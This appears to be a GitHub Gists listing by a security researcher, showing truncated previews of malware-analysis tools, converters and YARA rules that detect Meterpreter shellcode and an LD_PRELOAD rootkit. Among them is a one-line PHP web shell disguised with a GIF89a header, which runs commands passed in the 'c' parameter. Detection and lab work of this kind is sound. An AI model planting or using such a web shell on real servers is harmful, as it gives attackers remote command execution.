Nong Hoang Tu dmknght
dmknght
/ function_call_hash.py
Created
June 22, 2023 21:09
Use rizin / radare2 to collect function calls of a function, then generate hash. The point is to find code reuse
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import rzpipe # Using rizin framework. Replace with r2pipe for radare2 | |
| import json | |
| import hashlib | |
| import os | |
| class BinaryMetadata: | |
| def __init__(self, path: str): | |
| self.pipe = rzpipe.open(path) | |
| self.bin_path = path |
dmknght
/ qiling_with_asm.py
Created
June 19, 2023 07:59
print asm opcode and bytes from qiling emulator
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from qiling import Qiling | |
| from capstone import * | |
| md = Cs(CS_ARCH_X86, CS_MODE_64) | |
| def print_asm(ql, address, size): | |
| # Credits -> https://isc.sans.edu/diary/Qiling+A+true+instrumentable+binary+emulation+framework/27372 | |
| buf = ql.mem.read(address, size) | |
| for i in md.disasm(buf, address): | |
| opcode = ' '.join('{:02x}'.format(x) for x in i.bytes) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| dmknght<?php phpinfo();?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| GIF89a <?php system($_GET['c']);?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| GIF89a <?php phpinfo();?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| GIF89a hehe đang làm exam nè |
dmknght
/ parse_windef_sigs.nim
Last active
February 25, 2023 06:23
Parse signatures from extracted WinDef's DB. This script won't extract compressed DB (use WDExtract instead)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import streams | |
| import bitops | |
| import strutils | |
| import std/enumutils | |
| const | |
| db_name = "mpavbase.vdm.extracted" | |
| type |
dmknght
/ clam_hashes_to_yara.nim
Created
January 14, 2023 03:30
A quick nim script to convert ClamAV hashes to Yara rules
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Compile: nim c --opt:speed clam_hashes_to_yara.nim | |
| import strutils | |
| const | |
| clam_db_path = "/home/dmknght/Desktop/performance_comparison/main.hdb" | |
| yr_converted_rule = "/home/dmknght/Desktop/performance_comparison/clam_hashes.yara" | |
| type | |
| HashSig = object |
dmknght
/ meterpreter.yara
Created
December 30, 2022 10:39
Rule to detect Metasploit's meterpreter shellcode
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rule elf64_meterpreter_revtcp_raw { | |
| meta: | |
| description = "Detect Meterpreter ELF 64 staged reverse TCP no encoders" | |
| strings: | |
| $ = {6a 22 [4] 0f 05 [10] 6a 29 [8] 0f 05} | |
| condition: | |
| all of them | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import "elf" | |
| /* | |
| When system is infected by this rootkit | |
| all processes load malicious lib (LD_PRELOAD) | |
| It's possible to detect via strings, however, | |
| current Yara version doesn't load ELF header | |
| of mapped file. | |
| */ |